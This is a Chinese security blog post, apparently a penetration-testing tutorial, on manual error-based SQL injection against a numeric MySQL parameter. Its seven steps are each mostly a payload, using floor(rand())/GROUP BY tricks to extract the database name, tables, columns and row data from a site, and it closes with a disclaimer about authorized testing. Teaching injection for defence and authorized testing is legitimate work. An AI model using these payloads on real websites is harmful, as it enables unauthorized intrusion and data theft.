记手工SQL数字报错型注入

admin 2021年12月17日10:46:41安全文章评论71 views1797字阅读5分59秒阅读模式


前言

上篇已经发了一篇回显型SQL注入,SQL剩下的还有报错型、盲注,今天再记一下报错型的流程,仅做参考


01

正文


1.先通过引号 判断该网站为数字型,payload直接拼接,无需引号闭合,当网站后直接构造拼接 and 0# 网站商品列表内容受到影响提示报错,此为回报错型注入


记手工SQL数字报错型注入


payload:and 0#


2.这与回显型注入不一样的是,不需要确定回显位,这里直接使用floor()直接构造payload查询即可,查询收集数据库信息,注意查询出来的结果“1smtmax8_smtmax”里面的1为系统前半段查询出的结果,与最后结果无关,省略1即可,查询结果应为“smtmax8_smtmax” 到此,之后取数据的步骤都与回显型相似


记手工SQL数字报错型注入


payload:and (SELECT x FROM (SELECT count(),concat(floor(rand(0)2),database())x FROM information_schema.tables GROUP BY x)y)#


3.获取表数量,通过上一步得到mysql数据库版本大于5.1,可以通过MySQL的information_schema数据库进行数据获取,去掉1,则数据库表数量为6


记手工SQL数字报错型注入


payload:and (SELECT x FROM (SELECT count(),concat(floor(rand(0)2),(SELECT count() FROM information_schema.tables WHERE table_schema=database()))x FROMinformation_schema.tables GROUP BY x)y)#


4.取表名,通过LIMIT 0,1进行交替取值,一次过多可能会导致数据量过大的情况,一般通过取小数量字段即可正常取值


记手工SQL数字报错型注入


payload:and (SELECT x FROM (SELECT count(), concat(floor(rand(0)2),(SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)) x FROM information_schema.tables GROUP BY x)y)#


5.获取数据库表字段数


记手工SQL数字报错型注入


paylod:and (SELECT x FROM (SELECT count(),concat(floor(rand(0)2),(SELECT count() FROMinformation_schema.columns WHERE table_schema=database() and table_name=(SELECT table_name FROMinformation_schema.tables WHERE table_schema=database() LIMIT 1,1)))x FROM information_schema.tablesGROUP BY x)y)#


6.获取数据库表字段名


记手工SQL数字报错型注入


payload:and (SELECT x FROM (SELECT count(), concat(floor(rand(0)2),(SELECT column_name FROMinformation_schema.columns WHERE table_schema=database() and table_name='cms_info' LIMIT 0,1))x FROMinformation_schema.tables GROUP BY x)y)#


7.获取表数据,可以对敏感数据进行取值,这里但仅为演示


记手工SQL数字报错型注入


payload:and (SELECT x FROM (SELECT count(),concat(floor(rand(0)2),(SELECT concat(id) FROM cms_info LIMIT0,1))x FROM information_schema.tables GROUP BY x)y)#


02

说明


以mysql数据库,数字报错类型进行sql手工注入流程,仅供参考,大佬们点点赞,切勿进行非法入侵活动,一切渗透测试应在网站授权的前提下进行。


记手工SQL数字报错型注入

【火线短视频精选】



【周度激励】2021.8.23 ~ 2021.8.29公告


记手工SQL数字报错型注入


【相关精选文章】


这是一个SQL注入利用 in 进行waf绕过的图文实例


洞态IAST Python探针内测版发布


【招人专区】


记手工SQL数字报错型注入

记手工SQL数字报错型注入

本文始发于微信公众号(火线Zone):记手工SQL数字报错型注入

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月17日10:46:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  记手工SQL数字报错型注入 https://cn-sec.com/archives/495673.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: